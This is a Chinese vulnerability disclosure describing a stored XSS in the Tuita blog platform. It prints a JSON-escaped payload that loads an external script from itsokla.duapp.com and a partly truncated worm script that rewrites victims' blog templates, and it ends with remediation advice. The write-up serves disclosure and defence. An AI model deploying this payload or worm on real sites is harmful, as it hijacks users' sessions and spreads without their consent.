盛大推她存储型XSS

作者:hack1990 时间:12-09-17 阅读数:576人阅读

Tuita 开放了用户页面模板自定义功能, 但模板保存等主要操作(例如下文利用代码里调用的 /template/save)都位于 www.tuita.com 主域名下。要在受害者的登录态下代其改写模板, 脚本必须运行在 www.tuita.com 这个源(origin)上——用户子域名(xxx.tuita.com)里的自定义模板脚本受同源策略限制, 无法直接调用这些接口——因此需要寻找 www.tuita.com 主域名下的 XSS。

因为在特定标签下,可以展现我们所发布的内容。例如:

我们随便发表一个内容,标签贴上:wooyuntest

那么在,http://www.tuita.com/tagpage/wooyuntest 就可以看到我们发送的内容!

---------------------------------------

如果发布内容存在XSS的话,那么

http://www.tuita.com/tagpage/wooyuntest

页面将会出现XSS,从而被我们利用。

---------------------------------------

抱着这个目的,我们对发布内容进行XSS测试:

1. 首先发布一个正常内容:


2. 抓包,查看发送了什么数据:

地址:http://www.tuita.com/post/create
类型:POST
数据:见图片!


3. 可以看到 content 是 JSON 格式, 字符串值可以使用 \uXXXX 转义。把 song_id 的值改为 `376013\u0022\u003E`(服务端解析 JSON 后即为 `376013">`)提交, 再查看标签页的输出, 会发现……


4. 结果: 解码后的 `">` 原样出现在标签页的 HTML 里, 闭合了原来的属性和标签。这说明服务端在 JSON 解码之后没有对 song_id 做 HTML 编码; 如果前面有针对原始请求体的过滤, 也被 \u 转义绕过了。


知道怎么侧漏~,接着就简单了!

5. 构造闭合代码:


"></object><img/src="upload/201209171717448735.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,105,116,115,111,107,108,97,46,100,117,97,112,112,46,99,111,109,47,106,46,106,115);document.body.appendChild(window.s)"><object><i a="

6. 把上面的闭合代码逐字符做 \uXXXX 编码, 放入 content 的 song_id 字段中发送。注意实际发送的版本里 img 的 src 换成了 http://www.baidu.com/img/baidu_sylogo1.gif(与第 5 步的 upload/...gif 不同), 目的只是保证 onload 能触发; 真正的载荷是 onload 中用 String.fromCharCode 拼出的 script 标签, 它会加载外部脚本 http://itsokla.duapp.com/j.js。

 

{"PlayerFlashVar":"http:\/\/www.xiami.com\/widget\/0_376013\/singlePlayer.swf","song_id":"376013\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u006d\u0067\u002f\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0069\u006d\u0067\u002f\u0062\u0061\u0069\u0064\u0075\u005f\u0073\u0079\u006c\u006f\u0067\u006f\u0031\u002e\u0067\u0069\u0066\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u0029\u0029\u003b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u002e\u0073\u0072\u0063\u003d\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0037\u002c\u0031\u0030\u0038\u002c\u0039\u0037\u002c\u0034\u0036\u002c\u0031\u0030\u0030\u002c\u0031\u0031\u0037\u002c\u0039\u0037\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0032\u002c\u0034\u0036\u002c\u0039\u0039\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0031\u0030\u0036\u002c\u0034\u0036\u002c\u0031\u0030\u0036\u002c\u0031\u0031\u0035\u0029\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0077\u0069\u
006e\u0064\u006f\u0077\u002e\u0073\u0029\u0022\u003e\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u0020\u0061\u003d\u0022","song_name":"\u56ed\u6e38\u4f1a","artist_id":"\u5468\u6770\u4f26","album_name":"\u4e03\u91cc\u9999","album_logo":{"55":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_3.jpg","100":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_1.jpg","185":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_2.jpg","300":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_4.jpg"},"audio_info":{"album_logo":null,"description":"<P>ok! look!<\/P>"}}

7. 上面的利用代码(即通过 onload 加载的 j.js)会让受害者在 www.tuita.com 登录态下执行下面的脚本。原文此处被截断, getSetting 函数的开头已缺失(从下面 getID 的写法推测, 它同样是一次 pkav.get 调用, 用于取回受害者当前的博客模板), 只剩下从请求 URL 起的片段:
http://www.tuita.com/template/get?blog_id="+id+"&tsdump="+new Date().getTime(),function  (rs){
   var obj=eval("("+rs+")");
   if(obj.data&&obj.data.tpl_html&&obj.data.tpl_html.indexOf("wooyun")==-1){
    //说明还没有被感染~~
    obj.data.tpl_html=obj.data.tpl_html.replace(/<\/body>/,"<iframe src=\"http://www.tuita.com/tagpage/test\" style=\"display:none\" id=\"wooyun\"></iframe></body>");
    saveSetting(id,obj);
   }else{
    try{
     console.log("done!");
    }catch(e){}
   }
  });
 }
 function saveSetting(id,obj){
  pkav.post("http://www.tuita.com/template/save","blog_id="+id+"&theme=0&custom_vars=%5B%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu5934%5Cu50cf%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu6211%5Cu5173%5Cu6ce8%5Cu7684%5Cu535a%5Cu5ba2%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu641c%5Cu7d22%5Cu6846%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%5D&system_vars=%7B%22pagination_limit%22%3A%2210%22%7D&tpl_html="+encodeURIComponent(obj.data.tpl_html)+"&contribute_type=&contribute_tags=&contribute_rules=&contribute_save=1",function  (rs){
   try{
    console.log("ok!");
   }catch(e){}
  });
 }
 function getID(){
  pkav.get("http://www.tuita.com/home?hash="+Math.random(),function(rs){
   var id=pkav.fetch(rs,/http:\/\/www\.tuita\.com\/blogsetting\/(\d+)/);
   getSetting(id);
   //createPost(id);
  });
 }
 if(!window.___x){
  getID();
  window.___x=1;
 }
}

11. 漏洞效果见证明!

漏洞证明:
当已登录 tuita 的受害者访问 http://1881056377.tuita.com/(攻击者的博客, 其模板中嵌有指向带毒标签页的隐藏 iframe)后, 标签页中的 XSS 会在 www.tuita.com 源上以受害者身份执行上述脚本, 调用 /template/save 把同样的隐藏 iframe 写进受害者自己的博客模板; 此后任何访问受害者博客的登录用户同样会被感染, 形成蠕虫式传播。

访问以上地址的受害者,博客页面也插入了恶意代码,见下图:


 

修复方案:
1. 根本修复: 在把 post_content 中的 song_id 以及 song_name、artist_id、album_name、album_logo、audio_info 等所有字段(其余字段未测试, 但很可能走同一条输出路径)渲染到标签页/博客页 HTML 时, 按输出位置做上下文相关的编码(本例是 HTML 属性值上下文, 至少要编码 `" ' < > &`)。编码必须在服务端完成 JSON 解码之后、写入 HTML 之前进行——本文正是用 \u0022\u003E 这样的 JSON 转义绕过了只检查原始请求体的过滤, 因此单纯对请求体做"过滤"是不够的。
2. 纵深防御: 蠕虫的传播依赖于从用户子域名用 `display:none` 的 iframe 静默加载 www.tuita.com 的标签页, 以及在 onload 中加载外部脚本 http://itsokla.duapp.com/j.js。给 www.tuita.com 的页面加上 X-Frame-Options / CSP frame-ancestors 限制, 可阻止用户子域名无感知地嵌入主站页面; 在主站启用限制 script-src 的 CSP, 可阻止注入点加载外部脚本。注意 CSRF 令牌对同源 XSS 无效(脚本可以直接读到令牌), 不能作为此处的修复手段。
3. 应急排查: 可用模板中的 `<iframe src="http://www.tuita.com/tagpage/..." style="display:none" id="wooyun">` 以及外链脚本 itsokla.duapp.com/j.js 作为特征, 清理已被感染的博客模板, 并删除带毒的发布内容。

 
